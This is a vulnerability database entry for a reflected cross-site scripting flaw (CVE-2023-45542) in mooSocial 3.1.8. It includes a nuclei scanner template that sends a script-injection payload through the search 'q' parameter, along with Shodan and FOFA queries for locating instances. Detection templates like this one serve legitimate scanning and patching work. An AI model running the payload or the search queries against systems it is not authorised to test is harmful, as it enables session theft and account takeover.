Lucene search
K

MooSocial 3.1.8 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

A reflected cross-site scripting (XSS) vulnerability in MooSocial 3.1.8 allows attackers to steal user's session cookies and impersonate their account via a crafted URL

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Cross-site Scripting in Moosocial
26 Sep 202312:59
githubexploit
ATTACKERKB
CVE-2023-45542
16 Oct 202321:15
attackerkb
Circl
CVE-2023-45542
17 Oct 202300:32
circl
CNNVD
mooSocial 跨站脚本漏洞
16 Oct 202300:00
cnnvd
CNVD
mooSocial Cross-Site Scripting Vulnerability
19 Oct 202300:00
cnvd
CVE
CVE-2023-45542
16 Oct 202300:00
cve
Cvelist
CVE-2023-45542
16 Oct 202300:00
cvelist
NVD
CVE-2023-45542
16 Oct 202321:15
nvd
OSV
CVE-2023-45542
16 Oct 202321:15
osv
Prion
Cross site scripting
16 Oct 202321:15
prion
Rows per page
id: CVE-2023-45542

info:
  name: MooSocial 3.1.8 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exisits in the q parameter on search function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the q parameter in search functionality to steal session cookies and impersonate victim accounts on the MooSocial platform.
  remediation: |
    Update mooSocial to a version newer than 3.1.8 that properly sanitizes the q parameter in search functionality and encodes output to prevent reflected XSS attacks.
  reference:
    - https://github.com/ahrixia/CVE-2023-45542
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45542
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-45542
    cwe-id: CWE-79
    epss-score: 0.01635
    epss-percentile: 0.73425
    cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moosocial
    product: moosocial
    shodan-query: http.favicon.hash:"702863115"
    fofa-query: icon_hash="702863115"
  tags: cve2023,cve,xss,moosocial,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "mooSocial")'
        condition: and
# digest: 4a0a00473045022016ae9ad3906519052de283c6dd1c4f568ec4fa25d17f802efc81a7010a4feebc022100935f90051c089431610c7c27fc34366a7fc27864282221c95ca93478e50caad7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
EPSS0.01635
SSVC
42